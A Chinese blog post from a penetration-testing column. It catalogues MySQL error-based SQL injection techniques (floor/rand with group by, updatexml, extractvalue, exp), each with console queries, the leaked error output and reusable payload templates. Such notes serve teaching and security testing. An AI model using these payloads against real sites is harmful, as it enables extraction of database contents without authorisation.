SQL注入-报错注入

最新推荐文章于 2024-06-06 19:11:19 发布
最新推荐文章于 2024-06-06 19:11:19 发布
阅读量203 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43691308/article/details/105499940
版权

1、Floor

利用:

mysql> select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a;
ERROR 1062 (23000): Duplicate entry '5.1.41-3ubuntu12.6-log1' for key 'group_key'

x和a是给起的别名。即将 floor(rand(0)*2)这一串表示为X。完整写法:select 1 from (select count(*),concat(version(),floor(rand(0)*2)) as x from information_schema.tables group by x) as a;
总结select 1 from (select count(*),concat((子查询),'~',floor(rand(0)*2)) as x from information_schema.tables group by x) as a;
错误回显:ERROR 1242 (21000): Subquery returns more than 1 row使用limit查看,一次
错误回显:ERROR 1241 (21000): Operand should contain 1 column(s)检查子查询返回的列是否为一个

2、updatexml

利用:

mysql> select 1 and updatexml(1,(concat('~',(select version()),'~')),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.1.41-3ubuntu12.6-log~'

总结:and updatexml(1,concat('~',(子查询),'~'),1);
MySQL>5.1.5
最大返回32,如果返回的字符超过32则要使用字符串截断函数分次查看
EG:

select 1 and updatexml(1,concat('~',substring((select table_name from information_schema.tables where table_schema='test'),1,1)),1);
ERROR 1105 (HY000): XPATH syntax error: '~t'

3、extractvalue

利用:

mysql> select 1 and (SELECT extractvalue(null, user()));
ERROR 1105 (HY000): XPATH syntax error: '@localhost'

总结:select 1 and extractvalue('任意',concat(0x7e,(子查询),0x7e));
最大32,如果超过32则使用字符串截断函数分次查看(和updatexml相同)
MySQL>5.1.5

4、exp

MySQL版本对它存在影响。我的MySQL在5.1以下失败,5.4成功

成功:

mysql> select exp(~(select*from(select user()) as x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
mysql>
mysql> select @@version;
+-----------+
| @@version |
+-----------+
| 5.5.47    |
+-----------+
1 row in set (0.00 sec)

失败:

mysql> select @@version;
+------------------------+
| @@version              |
+------------------------+
| 5.1.41-3ubuntu12.6-log |
+------------------------+
1 row in set (0.00 sec)

mysql>  select exp(~(select*from(select user()) as x));
+-----------------------------------------+
| exp(~(select*from(select user()) as x)) |
+-----------------------------------------+
|                                    NULL |
+-----------------------------------------+
1 row in set (0.00 sec)

利用:

mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

了解利用exp

Saber-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
db2中count(*) as cnt报错_WEB安全之SQL注入(4)——floor报错
weixin_42497299的博客
12-17 529
大家好,我是阿里斯,一名IT行业小白。今天分享的内容是报错注入,本篇文章会以floor报错为中心进行分析,希望对你有所帮助!报错注入利用情景页面上没有显示位。但是会输出sql语句执行错误的信息floor报错注入常用函数 | 方法rand() 随机数函数floor() 向下取整函数count() 计数函数group by 分组方法floor...
SQL注入-基于报错的注入
xdjxi的博客
02-18 563
实验目的 熟悉报错功能函数extractvalue()的用法,掌握基于报错的SQL注入基本流程 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助extractvalue()函数,利用基于报错的注入方式获取SQLi-Labs网站用户名和密码 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-1/?id=1 2 寻找注入点 使用3条payload寻找注入点及判断注入点的类型 http://靶机ip/sql/Less-1/?id=1'运..
【转】Mysql基于报错注入floor(rand(0)*2)报错原理探究
mastergu2的博客
06-10 3677
原文写的很清楚很详细,这里给出原文链接: https://www.freebuf.com/column/235496.html 一、简述 floor报错注入是利用 select count(*),(floor(rand(0)*2)) x from users group by x这个相对固定的语句格式,导致的数据库报错。实际利用中通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,就实现了注入结果与报错信息回显的注入方式。具体利用本文不做阐述,本文重点探究该语句报错的原因,要理解
sql 报错注入
travelnight的博客
03-15 4081
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
Sql注入-报错注入
最新发布
WolvenSec的博客
06-06 970
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
最详细的SQL注入报错注入
qq_62539372的博客
06-23 1万+
最详细的sql注入报错注入,非常适合小白!!
SQL注入报错注入
热门推荐
4ct10n
10-07 1万+
做了一些报错注入的题目,总结了一下。原理很简单,只要理解了就能熟练的应用。大体上分了两类出来,一个是利用xml报错,另一个是正常数据库报错。两类的原理不同。
web-报错注入-皮卡丘靶场
07-15
防止报错注入的关键在于对用户输入进行严格的验证和过滤,避免在错误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试或安全训练时,皮卡丘靶场提供了...
第四节 基于报错的SQL注入-01
09-15
基于报错的SQL注入 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于报错的SQL注入,包括其分类、发现和利用方法。 SQL注入...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 报错注入 1.3 源码审计
SQL注入报错注入
Forget_liu的博客
06-10 1659
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
sql注入报错注入
2302_79119987的博客
04-19 1253
实行注入的地方。
sql注入——报错注入
m0_73756016的博客
10-18 1764
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
SQL 报错注入详解
2301_78008478的博客
05-08 920
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
SQL注入---报错注入
zhoutong2323的博客
04-04 697
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值